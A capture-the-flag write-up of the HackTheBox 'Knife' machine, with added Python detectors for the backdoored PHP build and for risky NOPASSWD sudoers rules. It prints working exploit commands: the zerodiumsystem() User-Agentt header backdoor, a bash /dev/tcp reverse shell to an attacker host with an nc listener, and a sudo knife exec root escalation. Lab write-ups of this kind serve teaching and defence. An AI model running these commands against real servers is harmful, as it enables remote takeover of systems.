Introduction
These are my notes from solving the Knife machine on HTB.
This is part of an attempt to work through the machines starting from the easiest ones.
Scanning
nmap -sC -sV -Pn -p- --min-rate 1000 $IP -oN nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-15 00:45 JST
Nmap scan report for 10.10.10.242
Host is up (0.51s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.58 seconds
HTTP is open.
Investigating port 80
Directory enumeration
gobuster dir -u $URL -w /usr/share/dirb/wordlists/common.txt -x html,php,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.242
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/.hta.txt (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/.hta.html (Status: 403) [Size: 277]
/.htaccess.html (Status: 403) [Size: 277]
/.htpasswd.txt (Status: 403) [Size: 277]
/.htaccess.txt (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htpasswd.html (Status: 403) [Size: 277]
/index.php (Status: 200) [Size: 5815]
/index.php (Status: 200) [Size: 5815]
/server-status (Status: 403) [Size: 277]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
===============================================================
Nothing particularly informative here...
Just to be safe, I also checked the Apache and SSH versions, but found no notable vulnerability information.
After some digging around, I arrived at the step of looking at the response headers.
curl -I $URL
HTTP/1.1 200 OK
Date: Mon, 14 Jul 2025 16:39:00 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8
PHP 8.1.0-dev
It turns out this is the version that had a backdoor planted in it.
Apparently RCE can be achieved by passing zerodiumsystem() in the User-Agentt header.
Let's actually try it.
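From the defender's side, the two artefacts above are exactly what you would want to detect: a server advertising the compromised PHP/8.1.0-dev build in X-Powered-By, and requests carrying a User-Agentt header that begins with zerodium. The Python below is an added example written for this writeup, not code from the original post; the HTTP response and the log lines are constructed, and it assumes a custom Apache LogFormat that records the User-Agentt header as %{User-Agentt}i (the stock "combined" format does not log that header at all).

```python
"""Added example: flag the backdoored PHP 8.1.0-dev build from response headers,
and flag requests carrying the backdoor trigger header in a web-server log.
All sample inputs are constructed, not captured from the original machine."""
import re

# The build that shipped with the planted backdoor; the writeup shows it in X-Powered-By.
BACKDOORED_PHP = "PHP/8.1.0-dev"
# The backdoor fires when the (misspelled) User-Agentt header starts with "zerodium".
TRIGGER_PREFIX = "zerodium"

# Constructed response head, modelled on the `curl -I` output in the writeup.
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Date: Mon, 14 Jul 2025 16:39:00 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8
"""


def parse_response_headers(raw: str) -> dict:
    """Parse a raw HTTP response head into a dict keyed by lower-cased header
    name. The status line is skipped; lines without a colon are ignored."""
    headers = {}
    for line in raw.splitlines()[1:]:
        if ":" not in line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def is_backdoored_php(headers: dict) -> bool:
    """True when the server advertises the compromised 8.1.0-dev build."""
    return headers.get("x-powered-by", "") == BACKDOORED_PHP


# Constructed log lines (assumption: combined format plus a trailing
# "%{User-Agentt}i" field; IPs are from documentation ranges).
SAMPLE_LOG = [
    '198.51.100.23 - - [14/Jul/2025:16:39:00 +0000] "HEAD / HTTP/1.1" 200 - "-" "curl/8.5.0" "-"',
    '198.51.100.23 - - [14/Jul/2025:16:40:12 +0000] "GET /index.php/test HTTP/1.1" 200 5815 "-" "curl/8.5.0" "zerodiumsystem(\'id\');"',
    '192.0.2.7 - - [14/Jul/2025:16:41:03 +0000] "GET /index.php HTTP/1.1" 200 5815 "-" "Mozilla/5.0" "-"',
]

# ip ident user [time] "request" status bytes "referer" "user-agent" "user-agentt"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d{3} \S+ '
    r'"[^"]*" "[^"]*" "(?P<uat>[^"]*)"$'
)


def find_backdoor_triggers(lines):
    """Return (client_ip, request, header_value) for every log line whose
    User-Agentt field starts with the backdoor trigger prefix."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        uat = m.group("uat")
        if uat.lower().startswith(TRIGGER_PREFIX):
            hits.append((m.group("ip"), m.group("req"), uat))
    return hits


if __name__ == "__main__":
    hdrs = parse_response_headers(SAMPLE_RESPONSE)
    print("backdoored build advertised:", is_backdoored_php(hdrs))
    for ip, req, uat in find_backdoor_triggers(SAMPLE_LOG):
        print(f"trigger from {ip}: {req!r} User-Agentt={uat!r}")
```

The header check is cheap enough to run across an inventory of web hosts; the log check only works once the extra header is actually being logged, which is the caveat worth remembering when building detections for a header-based backdoor.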
curl $URL/index.php/test -H "User-Agentt: zerodiumsystem('ls -la');"
uid=1000(james) gid=1000(james) groups=1000(james)
<!DOCTYPE html>
<html lang="en" >
(omitted)
It works, so let's set up a reverse shell.
curl $URL/index.php/test -H "User-Agentt: zerodiumsystem('bash -c \"bash -i >& /dev/tcp/$LHOST/1234 0>&1\"');"
Meanwhile, on the other side...
nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.242] 48726
bash: cannot set terminal process group (990): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:~$ ls -l
ls -l
total 4
-r-------- 1 james james 33 Jul 13 16:33 user.txt
Got the user flag.
On to the root flag
First, some investigation.
james@knife:~$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
The machine name's foreshadowing pays off!
Since knife can be run without a password,
james@knife:~$ sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
whoami
root
cd /root
ls
delete.sh
root.txt
snap
And with that, the root flag is captured too!
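The root step comes down to a single sudoers rule: a passwordless entry for a tool whose exec subcommand evaluates arbitrary code. The Python below is an added example for this writeup, not code from the original post. It audits a sudoers-style text for NOPASSWD rules and singles out knife, the one shell-capable binary the writeup itself demonstrates; the sample sudoers fragment is constructed, modelled on the sudo -l output above, and the SHELL_CAPABLE set is an assumption you would extend for your own estate.

```python
"""Added example: audit sudoers rules for passwordless commands that can hand the
caller a shell, as the knife rule on this box does. The sample input is a
constructed sudoers fragment, not the machine's real file."""
import os
import re

# Binaries this check treats as shell-capable. Only knife is taken from the
# writeup (knife exec evaluates arbitrary Ruby); extend the set for your hosts.
SHELL_CAPABLE = {"knife"}

# Constructed sample, modelled on the `sudo -l` output in the writeup.
SAMPLE_SUDOERS = """# constructed sample sudoers
Defaults env_reset, mail_badpass
Defaults secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
root ALL=(ALL:ALL) ALL
james ALL=(root) NOPASSWD: /usr/bin/knife
backup ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/ /mnt/backup/
deploy ALL=(root) /usr/bin/systemctl restart app
"""

# user  host = (runas) [TAG: ...] cmd1, cmd2   (runas part is optional)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return one dict per user-specification line. Comments, blank lines,
    Defaults lines and anything that does not look like a rule are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = set(re.findall(r"[A-Z]+", m.group("tags")))
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({
            "user": m.group("user"),
            "runas": (m.group("runas") or "root").strip(),
            "nopasswd": "NOPASSWD" in tags,
            "commands": cmds,
        })
    return rules


def risky_rules(text):
    """Return (user, runas, command, reason) for every passwordless rule, with a
    sharper reason when the rule is ALL or the binary is known to spawn a shell."""
    findings = []
    for rule in parse_sudoers(text):
        if not rule["nopasswd"]:
            continue
        for cmd in rule["commands"]:
            binary = "ALL" if cmd == "ALL" else os.path.basename(cmd.split()[0])
            if binary == "ALL":
                reason = "passwordless ALL"
            elif binary in SHELL_CAPABLE:
                reason = f"{binary} can spawn a shell (e.g. knife exec)"
            else:
                reason = "passwordless command, review for shell escapes"
            findings.append((rule["user"], rule["runas"], cmd, reason))
    return findings


if __name__ == "__main__":
    for user, runas, cmd, reason in risky_rules(SAMPLE_SUDOERS):
        print(f"{user} -> ({runas}) {cmd}: {reason}")
```

Run against the constructed sample, the james/knife rule is reported with the shell-capable reason, the backup/rsync rule is reported for manual review, and the password-protected deploy rule is not reported at all. The fix for the rule the writeup abuses is the usual one: no NOPASSWD for a tool that can evaluate code, or a wrapper that exposes only the needed subcommand.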